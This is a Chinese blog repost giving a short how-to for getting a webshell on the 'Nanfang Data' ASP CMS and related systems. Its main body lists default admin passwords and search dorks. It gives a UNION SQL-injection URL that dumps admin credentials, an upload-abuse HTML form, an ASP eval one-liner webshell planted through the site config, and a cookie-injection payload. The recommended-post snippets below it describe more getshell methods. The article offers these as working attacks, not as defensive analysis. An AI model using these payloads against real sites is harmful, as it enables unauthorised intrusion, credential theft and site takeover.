南方数据管理系统拿shell(一个小小的总结)

最新推荐文章于 2022-07-12 09:52:40 发布
最新推荐文章于 2022-07-12 09:52:40 发布
阅读量376 收藏
点赞数
原文链接:http://www.cnblogs.com/demonspider/archive/2012/06/25/2561102.html
版权

默认:

admin admin
admin  admin888
'or'='or'
默认数据库Databases/079lidc.mdb

改样式上传:http://www.yangtong.com/admin/southidceditor/admin_style.asp

抓包 明小子上传
 

 

注:通杀南方数据 良精系统 网软天下等

 

http://www.xxx.cn/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='

w78cms网站管理系统
关键词   inurl:ShopMore.asp?id
利用页面 /admin/ewebeditor/admin 默认账号密码  admin     198625

关键词:inurl:alogin.asp
木马上传后缀:asp;.asp.jpg
admin/upload.asp?fuptype=db&fupname=akt.asp;.asp&frmname=akt.asp


 

1.通过upfile_other.asp漏洞文件直接取SHELL
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>

<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="http://www.target.com/upfile_Other.asp"; method=post
encType=multipart/form-data><INPUT class="tx1" type=file size=30 name=FileName> <INPUT class="tx1" type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer asa或asp文件上传,后面需要加一个空格

 

2.Sql注入
http://www.target.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入
"%><%eval(request(chr(35)))%><%'
成功把shell写入http://www.target.com/inc/config.asp
这里一句话chr(32)密码是"#"

 

3.cookie注入
清空地址栏,利用union语句来注入,提交:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
用刺猬大哥的cookie注入转换工具亦可

 

转载于:https://www.cnblogs.com/demonspider/archive/2012/06/25/2561102.html

weixin_30487201
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
良精南方网站系统拿webshell的教程
03-06
通过利用良精南方系统的漏洞,实现进入网站后台,并上传 。马,得到一个webshell的教程,讲述详细,一看就会。利用该方法,可以配合工具实现批量拿站。
南方数据漏洞 想拿shell的就下吧
06-28
南方数据漏洞 感觉还不错!!!!
南方数据编辑器southidceditor最新注入0day漏洞
fengling132的专栏
06-30 6100
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 直接暴管理员帐号密码(md5) 2.登陆后台 3.利用编辑器上传: 访问
shell的一些方式
zdy8023的博客
04-06 6941
管理权限拿shell 需要有管理员权限才可以拿shell 如织梦cms 数据库备份拿shell 网站对上传的文件后缀进行过滤,不允许上传脚本类型文件如asp/php/jsp/aspx等 但是网站具有备份数据库备份功能,这时我们可以将webshell格式先将改为可允许上传的文件格式如jpg gif等 然后,我们找到上传后的文件路径,通过数据库备份,将文件备份为脚本格式 如动力文章 阉...
WordPress后台拿shell
asli33的专栏
04-11 5975
cnbird提供的一个方法WordPress3.0后台404页面可以自定义 “外观”-“编辑”-“404模板 插到文件头 点404模板的时候地址栏有相对路径,默认是wp-content/themes/twentyten/404.php 更新完直接访问localhost/wp-content/themes/twentyten/404.
南方数据企业网站管理系统源码包-存有sql注入漏洞与数据库备份getshell漏洞.zip
01-05
南方数据企业网站管理系统-存有sql注入漏洞与数据库备份getshell漏洞,如有侵权,请联系CSDN管理员删除即可
shell实现图书管理系统
09-15
主要介绍了shell实现图书管理系统,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
shell实现学生成绩管理系统
01-20
本文实例为大家分享了shell实现学生成绩管理系统的具体代码,供大家参考,具体内容如下 基本的操作 增加 删除 查询 展示全部学生信息 vim编辑保存信息的文件 遇到的问题 1.增加学生信息时 增加学生信息时,我用的...
完全使用Linux shell脚本语言编写的一个简单的作业管理系统
07-11
本项目是一个使用Linux Shell脚本实现的简单作业管理系统,它提供了对学生和教师友好的交互界面,使得作业管理更加高效。以下是这个系统中涉及的关键知识点: 1. **Shell脚本基础**:Linux Shell脚本是一种解释型...
科讯kesioncms 5.5以下漏洞拿shell方法的原理总结
09-28
科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。
南方数据asp企业网站管理系统 v19.0-ASP源码.zip
01-22
ASP源码,压缩包解压密码:www.cqlsoft.com
靶机-南方数据站源代码存在cookie注入
05-09
靶机-南方数据站源代码存在cookie注入!网站对get和post请求的参数进行过滤,请使用burpsuite修改cookie进行注入!
南方数据 企业管理系统
11-02
南方数据 企业管理系统 所有模块齐全,后台代码全部是明文,适合学习和下载使用
南方数据网站管理系统正式版5.0正式版.zip
06-29
南方数据网站的主目录,可以进行网站的攻击与防御技术,可以配套小旋风
南方数据企业网站管理系统 v18.0.zip
07-05
南方数据企业网站管理系统更新说明: 1.新增了成功案例功能。 2.修改了首页排版,网站比以前界面更美观、功能更全面; 3.新增了百度分享功能; 4.为了适应移动互联的要求,新版增加了手机版功能,扫描网站二维码自动跳转到手机网站; 5.新版升级了全新的编辑器,功能更强大,可一次上传多张图片; 6.新增产品订购自动发送EMAIL功能; 7.编辑器可批量上传图片; 8.重新设计了网站导航菜单功能,效果更美观; 9.新增产品多图功能,方便客户全方位展示产品图片; 10.增加产品,新闻自动生成静态页面,免去了又要重新生成静态的操作; 11.可在后台自定义产品属性; 12.新闻了网站生成RSS和XML功能,有利于网站排名; 13.全站使用DIV CSS排版,极大提升网站速度,更有利于搜索引擎收录数量和网店排名; 14.能在后台自动生成前台静态html网页,提升网站访问速度,兼容目前主流浏览器,提高搜索引擎收录数量和网店排名; 15.全站使用UTF-8国际编码,不管在国内的中文环境还是在国外的英文环境,网站都能正常显示; 16.网站搜索功能进行了整合; 17.优化了企业地址导航地图; 18.后台新增网站推广功能,更有利于企业网站的排名和收录; 19.对全站进行了SEO优化; 20.修复了以往发现的BUG.   南方数据企业网站管理系统 后台主要功能如下: 一、企业信息:发布介绍企业的各类信息,如企业简介、组织机构、联系方式,并可随意增加新的栏目,可设二级分类。 二、新闻动态:发布企业新闻和业内资讯,从后台到前台真正实现无限级分类显示,并随意控制显示级数。 三、产品展示:无限级分类,可调整产品类别和产品信息的显示顺序,可将产品同时设在二个类别下,可搜索产品,可多选产品直接下订单询盘。  四、下载资源:发布供网站浏览者和客户下载的资料等,如使用手册、销售合同、软件等,无限级分类。 五、荣誉管理:新增修改企业荣誉栏目的信息。新增修改企业形象栏目的信息。  六、人力资源:发布招聘信息,人才策略,浏览者可在线递交简历。 七、其他信息:相当于无限扩展栏,并可进行无限分类,可以用于发布网站主栏目未归类的信息,如解决方案、成功案例、购买流程等。  八、会员中心:会员可任意设置级别,并可根据级别限制浏览相关内容,会员机制与订购、应聘、留言三大模块有机结合的,同时考虑到网站访问者的惰性,所以会员机制与三大模块又可完全脱离,即未注册也同样能留言、下订单、递交简历。 九、留言反馈:以留言板的模式让有意见和建议的浏览者反馈回来,可设悄悄话留言方式,可设默认是否通过审核后显示留言 十、营销网络:修改营销网络栏目的信息。 十一、友情链接:可设文字和图片链接方式。 十二、网站导航:可随意开通、屏蔽网站模块,并可设置站外链接和链接的颜色,让网站可大可小。 十三、数据维护:在线备份、压缩、恢复数据库,管理登录日志。 十四、流量统计:非常详尽的访问统计数据,可做网站推广的重要参考。 十五、管理权限:可根据需要增设多个管理员帐户,并任意分配不同管理权限。 十六、自定义信息模块:如果您还有其他内容要发布,就用这个吧。   联系人QQ: 635495 手机:13065161861 电话:0791-83837312       相关阅读 同类推荐:企业网站源码
简单备份拿shell
weixin_34248849的博客
04-02 106
今天在 中国被黑站点统计系统 上看到别人拿的一个站,就顺便练习了一下,让大家见笑了,高手飘过,请大家多多指教,谢谢,具体请看附件。 转载于:https://blog.51cto.com/pcsafe/533816...
【文件上传漏洞-08】常见编辑器上传以及常见的CMS 上传漏洞
m0_64378913的博客
07-12 2205
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上传功能,这些编辑器的某些版本也存在文件上传漏洞,从而进行getshell(1)ewebeditor(比较古老的编辑器)(2)fckeditor利用小马拉大马也是一个惯用伎俩!CMS 又叫网站内容管理系统(网站的模版,帮助我们快速建站,我们会在这个网站模板上做二次开发),市面上很多开源的CMS 的历史版本有很多都存在着文件上传漏洞,但是产生文件上传漏洞的原因不尽相同,情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多,比如常见的dedeCMS(
南方数据CMSgetshell
qq_45300786的博客
05-13 690
文件上传 抓包修改,00截断(post) 连接木马
Cookie注入漏洞 + 数据库备份getshell——漏洞复现
W小哥
01-05 1656
一、环境搭建 网站源码在我的资源中,是:南方数据企业网站管理系统,下载后,使用iis平台搭建 二、漏洞复现 假设我们通过网站的sql注入漏洞,注入出用户名admin、密码admin123,登录网站后台如下图所示: ...
sqlmap 拿shell
最新发布
08-03
sqlmap是一款用于自动化SQL注入和数据库渗透测试的工具。它可以帮助用户获取数据库的shell,以便执行进一步的操作。有几种方法可以使用sqlmap来获取shell。 第一种方法是使用--sql-shell选项,该选项可以获取数据库的shell。如果操作系统shell无法获取,则可以选择使用该选项。 第二种方法是使用--os-pwn选项,该选项可以结合Metasploit Framework来反弹一个shell。如果提权不成功,可以使用该选项。 另外,sqlmap还提供了其他几种思路来获取shell。例如,利用dump管理员类的账户后进入站点进行拿shell,或者利用os-shell和sql-shell来获取shell。具体的方法取决于条件和权限。 总之,sqlmap是一个功能强大的工具,可以帮助用户在渗透测试中获取数据库的shell

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值